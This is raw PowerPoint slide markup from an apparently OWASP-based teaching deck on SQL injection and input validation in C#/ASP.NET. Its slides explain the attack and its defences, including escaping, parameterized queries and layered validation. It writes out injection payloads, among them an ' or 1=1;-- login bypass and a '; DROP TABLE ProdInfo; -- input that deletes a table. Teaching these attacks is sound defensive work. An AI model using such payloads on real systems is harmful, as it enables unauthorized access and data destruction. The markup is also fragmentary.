              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> text field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p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query1 would result in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	SELECT * FROM Users WHERE Username = ‘whatever’ or 1=1;-- (rest is comment)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latin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The attacker would bypass the authentication system as the “first” account /record in the data table Users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94316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err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtProduct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> field what if the attacker had instead entered:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘; DROP TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ProdInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>; --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query2 would result in the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/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ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>SELECT * FROM Products WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ProdName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’; DROP TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ProdInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Note how comment (--) consumes the final quote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Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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E3F40E2-8F73-4D6B-B6D0-F7398138BC2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94316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Causes the entire database or table to be deleted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Depends on knowledge of table name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>This is sometimes exposed to the user in debug code called during a database error.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A2.	Injection Flaws ( SQL Injection) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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E3F40E2-8F73-4D6B-B6D0-F7398138BC2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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="727055"/>
            <a:ext cx="9144001" cy="6130945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provided functions for escaping strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365125" lvl="2" indent="-255588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MSSQL- ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> ‘’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649287" lvl="3" indent="-255588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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>// Write helper function such as following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" charset="0"/>
              </a:rPr>
              <a:t>public static string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SqlSQuote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(string value)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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"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return “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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>value.Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(“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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”, “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’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”) + “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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”;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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> \’  and “  \”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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Use parameterized stored procedures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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Use parameterized dynamic SQL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" pitchFamily="18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42876"/>
            <a:ext cx="9144000" cy="114298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SQL Injection - Prevention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2DF08C-1BAF-41F8-9964-94FC8E63EF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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1176317"/>
            <a:ext cx="9144001" cy="5681683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Check syntax of input for validity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Many classes of input have fixed languages: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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Email addresses, dates, part numbers, etc.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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Verify that the input is a valid string in the language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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Sometime languages allow problematic characters (e.g., ‘*’ in email addresses); decide to not allow these.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ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Use limited account to handle application queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" pitchFamily="18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114298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SQL Injection - Prevention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2DF08C-1BAF-41F8-9964-94FC8E63EF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214974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Input accepted by the application is not properly validated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This can be used by the attackers to modify their inputs in unexpected ways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Corrupt input can communicate with all the resources used by the application which leads to corruption of all the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CWE-20: Improper Input Validation</a:t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705A89-302E-46DB-99D1-84D1B47DD83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err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Input Illustrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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381000" y="3817938"/>
            <a:ext cx="2187575" cy="3333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Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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403225" y="2928938"/>
            <a:ext cx="2187575" cy="333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Controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="403225" y="2547938"/>
            <a:ext cx="2187575" cy="333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Business Logic</a:t>
            </a:r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403225" y="2166938"/>
            <a:ext cx="2187575" cy="333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Mid-Tier (Data Layer)</a:t>
            </a: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406400" y="1776413"/>
            <a:ext cx="2187575" cy="333375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Presentation Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21511" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1470025" y="3313113"/>
            <a:ext cx="0" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00008C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12" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1473200" y="4214813"/>
            <a:ext cx="0" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00008C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13" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3378200" y="4579938"/>
            <a:ext cx="3886200" cy="601662"/>
          </a:xfrm>
          <a:prstGeom prst="callout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18995"/>
              <a:gd name="adj2" fmla="val -1963"/>
              <a:gd name="adj3" fmla="val -92347"/>
              <a:gd name="adj4" fmla="val -20630"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBE8E1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300" dirty="0">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Environment (WAF, SiteMinder, Web Server, App Server, or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> MS 	AntiXSSLibraryV1.0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>will enforce global validation rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21514" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3606800" y="3836988"/>
            <a:ext cx="3886200" cy="601662"/>
          </a:xfrm>
          <a:prstGeom prst="callout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18995"/>
              <a:gd name="adj2" fmla="val -1963"/>
              <a:gd name="adj3" fmla="val -124009"/>
              <a:gd name="adj4" fmla="val -25856"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBE8E1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300">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Controller can enforce general business validation rules on some parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21515" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3759200" y="3094038"/>
            <a:ext cx="3886200" cy="601662"/>
          </a:xfrm>
          <a:prstGeom prst="callout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18995"/>
              <a:gd name="adj2" fmla="val -1963"/>
              <a:gd name="adj3" fmla="val -59102"/>
              <a:gd name="adj4" fmla="val -29981"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBE8E1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300">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Business Logic should enforce specific business validation rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21516" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3911600" y="2351088"/>
            <a:ext cx="3886200" cy="601662"/>
          </a:xfrm>
          <a:prstGeom prst="callout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18995"/>
              <a:gd name="adj2" fmla="val -1963"/>
              <a:gd name="adj3" fmla="val 0"/>
              <a:gd name="adj4" fmla="val -34069"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBE8E1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300">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data Layer should validate and encode queries and should also validate and encode results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21517" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4216400" y="1608138"/>
            <a:ext cx="3886200" cy="601662"/>
          </a:xfrm>
          <a:prstGeom prst="callout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18995"/>
              <a:gd name="adj2" fmla="val -1963"/>
              <a:gd name="adj3" fmla="val 54880"/>
              <a:gd name="adj4" fmla="val -41338"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBE8E1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300">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presentation Layer can enforce output encoding of information gathered from data sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21518" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7810500" y="3198813"/>
            <a:ext cx="1066800" cy="839787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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21519" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3898900"/>
            <a:ext cx="1066800" cy="444500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 672"/>
              <a:gd name="T1" fmla="*/ 381000 h 280"/>
              <a:gd name="T2" fmla="*/ 914400 w 672"/>
              <a:gd name="T3" fmla="*/ 381000 h 280"/>
              <a:gd name="T4" fmla="*/ 914400 w 672"/>
              <a:gd name="T5" fmla="*/ 0 h 280"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 672"/>
              <a:gd name="T10" fmla="*/ 0 h 280"/>
              <a:gd name="T11" fmla="*/ 672 w 672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80">
                <a:moveTo>
                  <a:pt x="0" y="240"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="260"/>
                  <a:pt x="480" y="280"/>
                  <a:pt x="576" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="672" y="200"/>
                  <a:pt x="576" y="40"/>
                  <a:pt x="576" y="0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1520" name="Freeform 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="1620838"/>
            <a:ext cx="508000" cy="1511300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 320"/>
              <a:gd name="T1" fmla="*/ 215900 h 952"/>
              <a:gd name="T2" fmla="*/ 457200 w 320"/>
              <a:gd name="T3" fmla="*/ 215900 h 952"/>
              <a:gd name="T4" fmla="*/ 304800 w 320"/>
              <a:gd name="T5" fmla="*/ 1511300 h 952"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 320"/>
              <a:gd name="T10" fmla="*/ 0 h 952"/>
              <a:gd name="T11" fmla="*/ 320 w 320"/>
              <a:gd name="T12" fmla="*/ 952 h 9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952">
                <a:moveTo>
                  <a:pt x="0" y="136"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="68"/>
                  <a:pt x="256" y="0"/>
                  <a:pt x="288" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="272"/>
                  <a:pt x="256" y="612"/>
                  <a:pt x="192" y="952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1521" name="Freeform 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="19540269" flipV="1">
            <a:off x="7620000" y="3124200"/>
            <a:ext cx="533400" cy="228600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 672"/>
              <a:gd name="T1" fmla="*/ 195943 h 280"/>
              <a:gd name="T2" fmla="*/ 457200 w 672"/>
              <a:gd name="T3" fmla="*/ 195943 h 280"/>
              <a:gd name="T4" fmla="*/ 457200 w 672"/>
              <a:gd name="T5" fmla="*/ 0 h 280"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 672"/>
              <a:gd name="T10" fmla="*/ 0 h 280"/>
              <a:gd name="T11" fmla="*/ 672 w 672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80">
                <a:moveTo>
                  <a:pt x="0" y="240"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="260"/>
                  <a:pt x="480" y="280"/>
                  <a:pt x="576" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="672" y="200"/>
                  <a:pt x="576" y="40"/>
                  <a:pt x="576" y="0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1522" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1447800" y="1282700"/>
            <a:ext cx="0" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00008C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3" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-34925" y="6572272"/>
            <a:ext cx="4095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cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/How_to_add_validation_logic_to_HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:cs typeface="Arial" charset="0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356828"/>
            <a:ext cx="47148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www.aspectsecurity.com/documents/Aspect_OWASP_Top_10_Part_1.ppt - Similar pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21525" name="Slide Number Placeholder 2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CE533F-E292-49F9-B9F5-4391CFC5E7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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21526" name="Footer Placeholder 2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8893175" cy="1071546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C#ASP.Net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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody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xfrm>
            <a:off x="0" y="1071547"/>
            <a:ext cx="9144000" cy="5165742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>//Reading user supplied values from input text fields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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>string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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>;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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>string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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtPassword.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
